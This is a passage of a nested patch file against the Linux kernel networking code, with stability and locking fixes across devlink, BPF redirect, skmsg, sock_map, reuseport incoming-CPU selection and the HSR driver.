+-	BUILD_BUG_ON(sizeof(*stats64) < sizeof(*netdev_stats));
+-	memcpy(stats64, netdev_stats, sizeof(*netdev_stats));
+-	/* zero out counters that only exist in rtnl_link_stats64 */
+-	memset((char *)stats64 + sizeof(*netdev_stats), 0,
+-	       sizeof(*stats64) - sizeof(*netdev_stats));
+-#else
+-	size_t i, n = sizeof(*netdev_stats) / sizeof(unsigned long);
+-	const unsigned long *src = (const unsigned long *)netdev_stats;
++	size_t i, n = sizeof(*netdev_stats) / sizeof(atomic_long_t);
++	const atomic_long_t *src = (atomic_long_t *)netdev_stats;
+ 	u64 *dst = (u64 *)stats64;
+ 
+ 	BUILD_BUG_ON(n > sizeof(*stats64) / sizeof(u64));
+ 	for (i = 0; i < n; i++)
+-		dst[i] = src[i];
++		dst[i] = atomic_long_read(&src[i]);
+ 	/* zero out counters that only exist in rtnl_link_stats64 */
+ 	memset((char *)stats64 + n * sizeof(u64), 0,
+ 	       sizeof(*stats64) - n * sizeof(u64));
+-#endif
+ }
+ EXPORT_SYMBOL(netdev_stats_to_stats64);
+ 
+diff --git a/net/core/devlink.c b/net/core/devlink.c
+index 89baa7c0938b9..2aa77d4b80d0a 100644
+--- a/net/core/devlink.c
++++ b/net/core/devlink.c
+@@ -1505,10 +1505,13 @@ static int devlink_nl_cmd_get_dumpit(struct sk_buff *msg,
+ 			continue;
+ 		}
+ 
++		devl_lock(devlink);
+ 		err = devlink_nl_fill(msg, devlink, DEVLINK_CMD_NEW,
+ 				      NETLINK_CB(cb->skb).portid,
+ 				      cb->nlh->nlmsg_seq, NLM_F_MULTI);
++		devl_unlock(devlink);
+ 		devlink_put(devlink);
++
+ 		if (err)
+ 			goto out;
+ 		idx++;
+@@ -11435,8 +11438,10 @@ void devl_region_destroy(struct devlink_region *region)
+ 	devl_assert_locked(devlink);
+ 
+ 	/* Free all snapshots of region */
++	mutex_lock(&region->snapshot_lock);
+ 	list_for_each_entry_safe(snapshot, ts, &region->snapshot_list, list)
+ 		devlink_region_snapshot_del(region, snapshot);
++	mutex_unlock(&region->snapshot_lock);
+ 
+ 	list_del(&region->list);
+ 	mutex_destroy(&region->snapshot_lock);
+diff --git a/net/core/filter.c b/net/core/filter.c
+index bb0136e7a8e42..a368edd9057c7 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -80,6 +80,7 @@
+ #include <net/tls.h>
+ #include <net/xdp.h>
+ #include <net/mptcp.h>
++#include <net/netfilter/nf_conntrack_bpf.h>
+ 
+ static const struct bpf_func_proto *
+ bpf_sk_base_func_proto(enum bpf_func_id func_id);
+@@ -2124,8 +2125,17 @@ static int __bpf_redirect_no_mac(struct sk_buff *skb, struct net_device *dev,
+ {
+ 	unsigned int mlen = skb_network_offset(skb);
+ 
++	if (unlikely(skb->len <= mlen)) {
++		kfree_skb(skb);
++		return -ERANGE;
++	}
++
+ 	if (mlen) {
+ 		__skb_pull(skb, mlen);
++		if (unlikely(!skb->len)) {
++			kfree_skb(skb);
++			return -ERANGE;
++		}
+ 
+ 		/* At ingress, the mac header has already been pulled once.
+ 		 * At egress, skb_pospull_rcsum has to be done in case that
+@@ -2145,7 +2155,7 @@ static int __bpf_redirect_common(struct sk_buff *skb, struct net_device *dev,
+ 				 u32 flags)
+ {
+ 	/* Verify that a link layer header is carried */
+-	if (unlikely(skb->mac_header >= skb->network_header)) {
++	if (unlikely(skb->mac_header >= skb->network_header || skb->len == 0)) {
+ 		kfree_skb(skb);
+ 		return -ERANGE;
+ 	}
+@@ -7983,6 +7993,19 @@ xdp_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
+ 	default:
+ 		return bpf_sk_base_func_proto(func_id);
+ 	}
++
++#if IS_MODULE(CONFIG_NF_CONNTRACK) && IS_ENABLED(CONFIG_DEBUG_INFO_BTF_MODULES)
++	/* The nf_conn___init type is used in the NF_CONNTRACK kfuncs. The
++	 * kfuncs are defined in two different modules, and we want to be able
++	 * to use them interchangably with the same BTF type ID. Because modules
++	 * can't de-duplicate BTF IDs between each other, we need the type to be
++	 * referenced in the vmlinux BTF or the verifier will get confused about
++	 * the different types. So we add this dummy type reference which will
++	 * be included in vmlinux BTF, allowing both modules to refer to the
++	 * same type ID.
++	 */
++	BTF_TYPE_EMIT(struct nf_conn___init);
++#endif
+ }
+ 
+ const struct bpf_func_proto bpf_sock_map_update_proto __weak;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 88fa40571d0c7..759bede0b3dd6 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -2416,6 +2416,9 @@ void *__pskb_pull_tail(struct sk_buff *skb, int delta)
+ 				insp = list;
+ 			} else {
+ 				/* Eaten partially. */
++				if (skb_is_gso(skb) && !list->head_frag &&
++				    skb_headlen(list))
++					skb_shinfo(skb)->gso_type |= SKB_GSO_DODGY;
+ 
+ 				if (skb_shared(list)) {
+ 					/* Sucks! We need to fork list. :-( */
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index e6b9ced3eda82..53d0251788aa2 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -886,13 +886,16 @@ int sk_psock_msg_verdict(struct sock *sk, struct sk_psock *psock,
+ 	ret = sk_psock_map_verd(ret, msg->sk_redir);
+ 	psock->apply_bytes = msg->apply_bytes;
+ 	if (ret == __SK_REDIRECT) {
+-		if (psock->sk_redir)
++		if (psock->sk_redir) {
+ 			sock_put(psock->sk_redir);
+-		psock->sk_redir = msg->sk_redir;
+-		if (!psock->sk_redir) {
++			psock->sk_redir = NULL;
++		}
++		if (!msg->sk_redir) {
+ 			ret = __SK_DROP;
+ 			goto out;
+ 		}
++		psock->redir_ingress = sk_msg_to_ingress(msg);
++		psock->sk_redir = msg->sk_redir;
+ 		sock_hold(psock->sk_redir);
+ 	}
+ out:
+diff --git a/net/core/sock.c b/net/core/sock.c
+index a3ba0358c77c0..30407b2dd2ac4 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -1436,7 +1436,7 @@ set_sndbuf:
+ 		break;
+ 		}
+ 	case SO_INCOMING_CPU:
+-		WRITE_ONCE(sk->sk_incoming_cpu, val);
++		reuseport_update_incoming_cpu(sk, val);
+ 		break;
+ 
+ 	case SO_CNX_ADVICE:
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 81beb16ab1ebf..22fa2c5bc6ec9 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -349,11 +349,13 @@ static void sock_map_free(struct bpf_map *map)
+ 
+ 		sk = xchg(psk, NULL);
+ 		if (sk) {
++			sock_hold(sk);
+ 			lock_sock(sk);
+ 			rcu_read_lock();
+ 			sock_map_unref(sk, psk);
+ 			rcu_read_unlock();
+ 			release_sock(sk);
++			sock_put(sk);
+ 		}
+ 	}
+ 
+diff --git a/net/core/sock_reuseport.c b/net/core/sock_reuseport.c
+index fb90e1e00773b..5a165286e4d8e 100644
+--- a/net/core/sock_reuseport.c
++++ b/net/core/sock_reuseport.c
+@@ -37,6 +37,70 @@ void reuseport_has_conns_set(struct sock *sk)
+ }
+ EXPORT_SYMBOL(reuseport_has_conns_set);
+ 
++static void __reuseport_get_incoming_cpu(struct sock_reuseport *reuse)
++{
++	/* Paired with READ_ONCE() in reuseport_select_sock_by_hash(). */
++	WRITE_ONCE(reuse->incoming_cpu, reuse->incoming_cpu + 1);
++}
++
++static void __reuseport_put_incoming_cpu(struct sock_reuseport *reuse)
++{
++	/* Paired with READ_ONCE() in reuseport_select_sock_by_hash(). */
++	WRITE_ONCE(reuse->incoming_cpu, reuse->incoming_cpu - 1);
++}
++
++static void reuseport_get_incoming_cpu(struct sock *sk, struct sock_reuseport *reuse)
++{
++	if (sk->sk_incoming_cpu >= 0)
++		__reuseport_get_incoming_cpu(reuse);
++}
++
++static void reuseport_put_incoming_cpu(struct sock *sk, struct sock_reuseport *reuse)
++{
++	if (sk->sk_incoming_cpu >= 0)
++		__reuseport_put_incoming_cpu(reuse);
++}
++
++void reuseport_update_incoming_cpu(struct sock *sk, int val)
++{
++	struct sock_reuseport *reuse;
++	int old_sk_incoming_cpu;
++
++	if (unlikely(!rcu_access_pointer(sk->sk_reuseport_cb))) {
++		/* Paired with REAE_ONCE() in sk_incoming_cpu_update()
++		 * and compute_score().
++		 */
++		WRITE_ONCE(sk->sk_incoming_cpu, val);
++		return;
++	}
++
++	spin_lock_bh(&reuseport_lock);
++
++	/* This must be done under reuseport_lock to avoid a race with
++	 * reuseport_grow(), which accesses sk->sk_incoming_cpu without
++	 * lock_sock() when detaching a shutdown()ed sk.
++	 *
++	 * Paired with READ_ONCE() in reuseport_select_sock_by_hash().
++	 */
++	old_sk_incoming_cpu = sk->sk_incoming_cpu;
++	WRITE_ONCE(sk->sk_incoming_cpu, val);
++
++	reuse = rcu_dereference_protected(sk->sk_reuseport_cb,
++					  lockdep_is_held(&reuseport_lock));
++
++	/* reuseport_grow() has detached a closed sk. */
++	if (!reuse)
++		goto out;
++
++	if (old_sk_incoming_cpu < 0 && val >= 0)
++		__reuseport_get_incoming_cpu(reuse);
++	else if (old_sk_incoming_cpu >= 0 && val < 0)
++		__reuseport_put_incoming_cpu(reuse);
++
++out:
++	spin_unlock_bh(&reuseport_lock);
++}
++
+ static int reuseport_sock_index(struct sock *sk,
+ 				const struct sock_reuseport *reuse,
+ 				bool closed)
+@@ -64,6 +128,7 @@ static void __reuseport_add_sock(struct sock *sk,
+ 	/* paired with smp_rmb() in reuseport_(select|migrate)_sock() */
+ 	smp_wmb();
+ 	reuse->num_socks++;
++	reuseport_get_incoming_cpu(sk, reuse);
+ }
+ 
+ static bool __reuseport_detach_sock(struct sock *sk,
+@@ -76,6 +141,7 @@ static bool __reuseport_detach_sock(struct sock *sk,
+ 
+ 	reuse->socks[i] = reuse->socks[reuse->num_socks - 1];
+ 	reuse->num_socks--;
++	reuseport_put_incoming_cpu(sk, reuse);
+ 
+ 	return true;
+ }
+@@ -86,6 +152,7 @@ static void __reuseport_add_closed_sock(struct sock *sk,
+ 	reuse->socks[reuse->max_socks - reuse->num_closed_socks - 1] = sk;
+ 	/* paired with READ_ONCE() in inet_csk_bind_conflict() */
+ 	WRITE_ONCE(reuse->num_closed_socks, reuse->num_closed_socks + 1);
++	reuseport_get_incoming_cpu(sk, reuse);
+ }
+ 
+ static bool __reuseport_detach_closed_sock(struct sock *sk,
+@@ -99,6 +166,7 @@ static bool __reuseport_detach_closed_sock(struct sock *sk,
+ 	reuse->socks[i] = reuse->socks[reuse->max_socks - reuse->num_closed_socks];
+ 	/* paired with READ_ONCE() in inet_csk_bind_conflict() */
+ 	WRITE_ONCE(reuse->num_closed_socks, reuse->num_closed_socks - 1);
++	reuseport_put_incoming_cpu(sk, reuse);
+ 
+ 	return true;
+ }
+@@ -166,6 +234,7 @@ int reuseport_alloc(struct sock *sk, bool bind_inany)
+ 	reuse->bind_inany = bind_inany;
+ 	reuse->socks[0] = sk;
+ 	reuse->num_socks = 1;
++	reuseport_get_incoming_cpu(sk, reuse);
+ 	rcu_assign_pointer(sk->sk_reuseport_cb, reuse);
+ 
+ out:
+@@ -209,6 +278,7 @@ static struct sock_reuseport *reuseport_grow(struct sock_reuseport *reuse)
+ 	more_reuse->reuseport_id = reuse->reuseport_id;
+ 	more_reuse->bind_inany = reuse->bind_inany;
+ 	more_reuse->has_conns = reuse->has_conns;
++	more_reuse->incoming_cpu = reuse->incoming_cpu;
+ 
+ 	memcpy(more_reuse->socks, reuse->socks,
+ 	       reuse->num_socks * sizeof(struct sock *));
+@@ -458,18 +528,32 @@ static struct sock *run_bpf_filter(struct sock_reuseport *reuse, u16 socks,
+ static struct sock *reuseport_select_sock_by_hash(struct sock_reuseport *reuse,
+ 						  u32 hash, u16 num_socks)
+ {
++	struct sock *first_valid_sk = NULL;
+ 	int i, j;
+ 
+ 	i = j = reciprocal_scale(hash, num_socks);
+-	while (reuse->socks[i]->sk_state == TCP_ESTABLISHED) {
++	do {
++		struct sock *sk = reuse->socks[i];
++
++		if (sk->sk_state != TCP_ESTABLISHED) {
++			/* Paired with WRITE_ONCE() in __reuseport_(get|put)_incoming_cpu(). */
++			if (!READ_ONCE(reuse->incoming_cpu))
++				return sk;
++
++			/* Paired with WRITE_ONCE() in reuseport_update_incoming_cpu(). */
++			if (READ_ONCE(sk->sk_incoming_cpu) == raw_smp_processor_id())
++				return sk;
++
++			if (!first_valid_sk)
++				first_valid_sk = sk;
++		}
++
+ 		i++;
+ 		if (i >= num_socks)
+ 			i = 0;
+-		if (i == j)
+-			return NULL;
+-	}
++	} while (i != j);
+ 
+-	return reuse->socks[i];
++	return first_valid_sk;
+ }
+ 
+ /**
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 75fded8495f5b..516895f482356 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -196,6 +196,12 @@ void sk_stream_kill_queues(struct sock *sk)
+ 	/* First the read buffer. */
+ 	__skb_queue_purge(&sk->sk_receive_queue);
+ 
++	/* Next, the error queue.
++	 * We need to use queue lock, because other threads might
++	 * add packets to the queue without socket lock being held.
++	 */
++	skb_queue_purge(&sk->sk_error_queue);
++
+ 	/* Next, the write queue. */
+ 	WARN_ON_ONCE(!skb_queue_empty(&sk->sk_write_queue));
+ 
+diff --git a/net/dsa/tag_8021q.c b/net/dsa/tag_8021q.c
+index 34e5ec5d3e236..89371b16416e2 100644
+--- a/net/dsa/tag_8021q.c
++++ b/net/dsa/tag_8021q.c
+@@ -398,6 +398,7 @@ static void dsa_tag_8021q_teardown(struct dsa_switch *ds)
+ int dsa_tag_8021q_register(struct dsa_switch *ds, __be16 proto)
+ {
+ 	struct dsa_8021q_context *ctx;
++	int err;
+ 
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+@@ -410,7 +411,15 @@ int dsa_tag_8021q_register(struct dsa_switch *ds, __be16 proto)
+ 
+ 	ds->tag_8021q_ctx = ctx;
+ 
+-	return dsa_tag_8021q_setup(ds);
++	err = dsa_tag_8021q_setup(ds);
++	if (err)
++		goto err_free;
++
++	return 0;
++
++err_free:
++	kfree(ctx);
++	return err;
+ }
+ EXPORT_SYMBOL_GPL(dsa_tag_8021q_register);
+ 
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 57e7238a4136b..81fe2422fe58a 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -2008,7 +2008,8 @@ static int ethtool_phys_id(struct net_device *dev, void __user *useraddr)
+ 	} else {
+ 		/* Driver expects to be called at twice the frequency in rc */
+ 		int n = rc * 2, interval = HZ / n;
+-		u64 count = n * id.data, i = 0;
++		u64 count = mul_u32_u32(n, id.data);
++		u64 i = 0;
+ 
+ 		do {
+ 			rtnl_lock();
+diff --git a/net/hsr/hsr_debugfs.c b/net/hsr/hsr_debugfs.c
+index de476a4176314..1a195efc79cd1 100644
+--- a/net/hsr/hsr_debugfs.c
++++ b/net/hsr/hsr_debugfs.c
+@@ -9,7 +9,6 @@
+ #include <linux/module.h>
+ #include <linux/errno.h>
+ #include <linux/debugfs.h>
+-#include <linux/jhash.h>
+ #include "hsr_main.h"
+ #include "hsr_framereg.h"
+ 
+@@ -21,7 +20,6 @@ hsr_node_table_show(struct seq_file *sfp, void *data)
+ {
+ 	struct hsr_priv *priv = (struct hsr_priv *)sfp->private;
+ 	struct hsr_node *node;
+-	int i;
+ 
+ 	seq_printf(sfp, "Node Table entries for (%s) device\n",
+ 		   (priv->prot_version == PRP_V1 ? "PRP" : "HSR"));
+@@ -33,28 +31,22 @@ hsr_node_table_show(struct seq_file *sfp, void *data)
+ 		seq_puts(sfp, "DAN-H\n");
+ 
+ 	rcu_read_lock();
+-
+-	for (i = 0 ; i < priv->hash_buckets; i++) {
+-		hlist_for_each_entry_rcu(node, &priv->node_db[i], mac_list) {
+-			/* skip self node */
+-			if (hsr_addr_is_self(priv, node->macaddress_A))
+-				continue;
+-			seq_printf(sfp, "%pM ", &node->macaddress_A[0]);
+-			seq_printf(sfp, "%pM ", &node->macaddress_B[0]);
+-			seq_printf(sfp, "%10lx, ",
+-				   node->time_in[HSR_PT_SLAVE_A]);
+-			seq_printf(sfp, "%10lx, ",
+-				   node->time_in[HSR_PT_SLAVE_B]);
+-			seq_printf(sfp, "%14x, ", node->addr_B_port);
+-
+-			if (priv->prot_version == PRP_V1)
+-				seq_printf(sfp, "%5x, %5x, %5x\n",
+-					   node->san_a, node->san_b,
+-					   (node->san_a == 0 &&
+-					    node->san_b == 0));
+-			else
+-				seq_printf(sfp, "%5x\n", 1);
+-		}
++	list_for_each_entry_rcu(node, &priv->node_db, mac_list) {
++		/* skip self node */
++		if (hsr_addr_is_self(priv, node->macaddress_A))
++			continue;
++		seq_printf(sfp, "%pM ", &node->macaddress_A[0]);
++		seq_printf(sfp, "%pM ", &node->macaddress_B[0]);
++		seq_printf(sfp, "%10lx, ", node->time_in[HSR_PT_SLAVE_A]);
++		seq_printf(sfp, "%10lx, ", node->time_in[HSR_PT_SLAVE_B]);
++		seq_printf(sfp, "%14x, ", node->addr_B_port);
++
++		if (priv->prot_version == PRP_V1)
++			seq_printf(sfp, "%5x, %5x, %5x\n",
++				   node->san_a, node->san_b,
++				   (node->san_a == 0 && node->san_b == 0));
++		else
++			seq_printf(sfp, "%5x\n", 1);
+ 	}
+ 	rcu_read_unlock();
+ 	return 0;
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index 6ffef47e9be55..b1e86a7265b32 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -219,7 +219,9 @@ static netdev_tx_t hsr_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		skb->dev = master->dev;
+ 		skb_reset_mac_header(skb);
+ 		skb_reset_mac_len(skb);
++		spin_lock_bh(&hsr->seqnr_lock);
+ 		hsr_forward_skb(skb, master);
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 	} else {
+ 		dev_core_stats_tx_dropped_inc(dev);
+ 		dev_kfree_skb_any(skb);
+@@ -278,7 +280,6 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	__u8 type = HSR_TLV_LIFE_CHECK;
+ 	struct hsr_sup_payload *hsr_sp;
+ 	struct hsr_sup_tag *hsr_stag;
+-	unsigned long irqflags;
+ 	struct sk_buff *skb;
+ 
+ 	*interval = msecs_to_jiffies(HSR_LIFE_CHECK_INTERVAL);
+@@ -299,7 +300,7 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	set_hsr_stag_HSR_ver(hsr_stag, hsr->prot_version);
+ 
+ 	/* From HSRv1 on we have separate supervision sequence numbers. */
+-	spin_lock_irqsave(&master->hsr->seqnr_lock, irqflags);
++	spin_lock_bh(&hsr->seqnr_lock);
+ 	if (hsr->prot_version > 0) {
+ 		hsr_stag->sequence_nr = htons(hsr->sup_sequence_nr);
+ 		hsr->sup_sequence_nr++;
+@@ -307,7 +308,6 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 		hsr_stag->sequence_nr = htons(hsr->sequence_nr);
+ 		hsr->sequence_nr++;
+ 	}
+-	spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
+ 
+ 	hsr_stag->tlv.HSR_TLV_type = type;
+ 	/* TODO: Why 12 in HSRv0? */
+@@ -318,11 +318,13 @@ static void send_hsr_supervision_frame(struct hsr_port *master,
+ 	hsr_sp = skb_put(skb, sizeof(struct hsr_sup_payload));
+ 	ether_addr_copy(hsr_sp->macaddress_A, master->dev->dev_addr);
+ 
+-	if (skb_put_padto(skb, ETH_ZLEN))
++	if (skb_put_padto(skb, ETH_ZLEN)) {
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 		return;
++	}
+ 
+ 	hsr_forward_skb(skb, master);
+-
++	spin_unlock_bh(&hsr->seqnr_lock);
+ 	return;
+ }
+ 
+@@ -332,7 +334,6 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	struct hsr_priv *hsr = master->hsr;
+ 	struct hsr_sup_payload *hsr_sp;
+ 	struct hsr_sup_tag *hsr_stag;
+-	unsigned long irqflags;
+ 	struct sk_buff *skb;
+ 
+ 	skb = hsr_init_skb(master);
+@@ -347,7 +348,7 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	set_hsr_stag_HSR_ver(hsr_stag, (hsr->prot_version ? 1 : 0));
+ 
+ 	/* From HSRv1 on we have separate supervision sequence numbers. */
+-	spin_lock_irqsave(&master->hsr->seqnr_lock, irqflags);
++	spin_lock_bh(&hsr->seqnr_lock);
+ 	hsr_stag->sequence_nr = htons(hsr->sup_sequence_nr);
+ 	hsr->sup_sequence_nr++;
+ 	hsr_stag->tlv.HSR_TLV_type = PRP_TLV_LIFE_CHECK_DD;
+@@ -358,13 +359,12 @@ static void send_prp_supervision_frame(struct hsr_port *master,
+ 	ether_addr_copy(hsr_sp->macaddress_A, master->dev->dev_addr);
+ 
+ 	if (skb_put_padto(skb, ETH_ZLEN)) {
+-		spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
++		spin_unlock_bh(&hsr->seqnr_lock);
+ 		return;
+ 	}
+ 
+-	spin_unlock_irqrestore(&master->hsr->seqnr_lock, irqflags);
+-
+ 	hsr_forward_skb(skb, master);
++	spin_unlock_bh(&hsr->seqnr_lock);
+ }
+ 
+ /* Announce (supervision frame) timer function
+@@ -444,7 +444,7 @@ void hsr_dev_setup(struct net_device *dev)
+ 	dev->header_ops = &hsr_header_ops;
+ 	dev->netdev_ops = &hsr_device_ops;
+ 	SET_NETDEV_DEVTYPE(dev, &hsr_type);
+-	dev->priv_flags |= IFF_NO_QUEUE;
++	dev->priv_flags |= IFF_NO_QUEUE | IFF_DISABLE_NETPOLL;
+ 
+ 	dev->needs_free_netdev = true;
+ 
+@@ -485,16 +485,12 @@ int hsr_dev_finalize(struct net_device *hsr_dev, struct net_device *slave[2],
+ {
+ 	bool unregister = false;
+ 	struct hsr_priv *hsr;
+-	int res, i;
++	int res;
+ 
+ 	hsr = netdev_priv(hsr_dev);
+ 	INIT_LIST_HEAD(&hsr->ports);
+-	INIT_HLIST_HEAD(&hsr->self_node_db);
+-	hsr->hash_buckets = HSR_HSIZE;
+-	get_random_bytes(&hsr->hash_seed, sizeof(hsr->hash_seed));
+-	for (i = 0; i < hsr->hash_buckets; i++)
+-		INIT_HLIST_HEAD(&hsr->node_db[i]);
+-
++	INIT_LIST_HEAD(&hsr->node_db);
++	INIT_LIST_HEAD(&hsr->self_node_db);
+ 	spin_lock_init(&hsr->list_lock);
+ 
+ 	eth_hw_addr_set(hsr_dev, slave[0]->dev_addr);
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 56bb27d67a2ee..629daacc96071 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -500,7 +500,6 @@ static void handle_std_frame(struct sk_buff *skb,
+ {
+ 	struct hsr_port *port = frame->port_rcv;
+ 	struct hsr_priv *hsr = port->hsr;
+-	unsigned long irqflags;
+ 
+ 	frame->skb_hsr = NULL;
+ 	frame->skb_prp = NULL;
+@@ -510,10 +509,9 @@ static void handle_std_frame(struct sk_buff *skb,
+ 		frame->is_from_san = true;
+ 	} else {
+ 		/* Sequence nr for the master node */
+-		spin_lock_irqsave(&hsr->seqnr_lock, irqflags);
++		lockdep_assert_held(&hsr->seqnr_lock);
+ 		frame->sequence_nr = hsr->sequence_nr;
+ 		hsr->sequence_nr++;
+-		spin_unlock_irqrestore(&hsr->seqnr_lock, irqflags);
+ 	}
+ }
+ 
+@@ -571,23 +569,20 @@ static int fill_frame_info(struct hsr_frame_info *frame,
+ 	struct ethhdr *ethhdr;
+ 	__be16 proto;
+ 	int ret;
+-	u32 hash;
+ 
+ 	/* Check if skb contains ethhdr */
+ 	if (skb->mac_len < sizeof(struct ethhdr))
+ 		return -EINVAL;
+ 
+ 	memset(frame, 0, sizeof(*frame));
+-
+-	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+-	hash = hsr_mac_hash(port->hsr, ethhdr->h_source);
+ 	frame->is_supervision = is_supervision_frame(port->hsr, skb);
+-	frame->node_src = hsr_get_node(port, &hsr->node_db[hash], skb,
++	frame->node_src = hsr_get_node(port, &hsr->node_db, skb,
+ 				       frame->is_supervision,
+ 				       port->type);
+ 	if (!frame->node_src)
+ 		return -1; /* Unknown node and !is_supervision, or no mem */
+ 
++	ethhdr = (struct ethhdr *)skb_mac_header(skb);
+ 	frame->is_vlan = false;
+ 	proto = ethhdr->h_proto;
+ 
+@@ -617,11 +612,13 @@ void hsr_forward_skb(struct sk_buff *skb, struct hsr_port *port)
+ {
+ 	struct hsr_frame_info frame;
+ 
++	rcu_read_lock();
+ 	if (fill_frame_info(&frame, skb, port) < 0)
+ 		goto out_drop;
+ 
+ 	hsr_register_frame_in(frame.node_src, port, frame.sequence_nr);
+ 	hsr_forward_do(&frame);
++	rcu_read_unlock();
+ 	/* Gets called for ingress frames as well as egress from master port.
+ 	 * So check and increment stats for master port only here.
+ 	 */
+@@ -636,6 +633,7 @@ void hsr_forward_skb(struct sk_buff *skb, struct hsr_port *port)
+ 	return;
+ 
+ out_drop:
++	rcu_read_unlock();
+ 	port->dev->stats.tx_dropped++;
+ 	kfree_skb(skb);
+ }
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 584e217887997..39a6088080e93 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -15,37 +15,10 @@
+ #include <linux/etherdevice.h>
+ #include <linux/slab.h>
+ #include <linux/rculist.h>
+-#include <linux/jhash.h>
+ #include "hsr_main.h"
+ #include "hsr_framereg.h"
+ #include "hsr_netlink.h"
+ 
+-#ifdef CONFIG_LOCKDEP
+-int lockdep_hsr_is_held(spinlock_t *lock)
+-{
+-	return lockdep_is_held(lock);
+-}
+-#endif
+-
+-u32 hsr_mac_hash(struct hsr_priv *hsr, const unsigned char *addr)
+-{
+-	u32 hash = jhash(addr, ETH_ALEN, hsr->hash_seed);
+-
+-	return reciprocal_scale(hash, hsr->hash_buckets);
+-}
+-
+-struct hsr_node *hsr_node_get_first(struct hlist_head *head, spinlock_t *lock)
+-{
+-	struct hlist_node *first;
+-
+-	first = rcu_dereference_bh_check(hlist_first_rcu(head),
+-					 lockdep_hsr_is_held(lock));
+-	if (first)
+-		return hlist_entry(first, struct hsr_node, mac_list);
+-
+-	return NULL;
+-}
+-
+ /* seq_nr_after(a, b) - return true if a is after (higher in sequence than) b,
+  * false otherwise.
+  */
+@@ -67,7 +40,8 @@ bool hsr_addr_is_self(struct hsr_priv *hsr, unsigned char *addr)
+ {
+ 	struct hsr_node *node;
+ 
+-	node = hsr_node_get_first(&hsr->self_node_db, &hsr->list_lock);
++	node = list_first_or_null_rcu(&hsr->self_node_db, struct hsr_node,
++				      mac_list);
+ 	if (!node) {
+ 		WARN_ONCE(1, "HSR: No self node\n");
+ 		return false;
+@@ -83,12 +57,12 @@ bool hsr_addr_is_self(struct hsr_priv *hsr, unsigned char *addr)
+ 
+ /* Search for mac entry. Caller must hold rcu read lock.
+  */
+-static struct hsr_node *find_node_by_addr_A(struct hlist_head *node_db,
++static struct hsr_node *find_node_by_addr_A(struct list_head *node_db,
+ 					    const unsigned char addr[ETH_ALEN])
+ {
+ 	struct hsr_node *node;
+ 
+-	hlist_for_each_entry_rcu(node, node_db, mac_list) {
++	list_for_each_entry_rcu(node, node_db, mac_list) {
+ 		if (ether_addr_equal(node->macaddress_A, addr))
+ 			return node;
+ 	}
+@@ -103,7 +77,7 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 			 const unsigned char addr_a[ETH_ALEN],
+ 			 const unsigned char addr_b[ETH_ALEN])
+ {
+-	struct hlist_head *self_node_db = &hsr->self_node_db;
++	struct list_head *self_node_db = &hsr->self_node_db;
+ 	struct hsr_node *node, *oldnode;
+ 
+ 	node = kmalloc(sizeof(*node), GFP_KERNEL);
+@@ -114,13 +88,14 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 	ether_addr_copy(node->macaddress_B, addr_b);
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	oldnode = hsr_node_get_first(self_node_db, &hsr->list_lock);
++	oldnode = list_first_or_null_rcu(self_node_db,
++					 struct hsr_node, mac_list);
+ 	if (oldnode) {
+-		hlist_replace_rcu(&oldnode->mac_list, &node->mac_list);
++		list_replace_rcu(&oldnode->mac_list, &node->mac_list);
+ 		spin_unlock_bh(&hsr->list_lock);
+ 		kfree_rcu(oldnode, rcu_head);
+ 	} else {
+-		hlist_add_tail_rcu(&node->mac_list, self_node_db);
++		list_add_tail_rcu(&node->mac_list, self_node_db);
+ 		spin_unlock_bh(&hsr->list_lock);
+ 	}
+ 
+@@ -129,25 +104,25 @@ int hsr_create_self_node(struct hsr_priv *hsr,
+ 
+ void hsr_del_self_node(struct hsr_priv *hsr)
+ {
+-	struct hlist_head *self_node_db = &hsr->self_node_db;
++	struct list_head *self_node_db = &hsr->self_node_db;
+ 	struct hsr_node *node;
+ 
+ 	spin_lock_bh(&hsr->list_lock);
+-	node = hsr_node_get_first(self_node_db, &hsr->list_lock);
++	node = list_first_or_null_rcu(self_node_db, struct hsr_node, mac_list);
+ 	if (node) {
+-		hlist_del_rcu(&node->mac_list);
++		list_del_rcu(&node->mac_list);
+ 		kfree_rcu(node, rcu_head);
+ 	}
+ 	spin_unlock_bh(&hsr->list_lock);
+ }
+ 
+-void hsr_del_nodes(struct hlist_head *node_db)
++void hsr_del_nodes(struct list_head *node_db)
+ {
+ 	struct hsr_node *node;
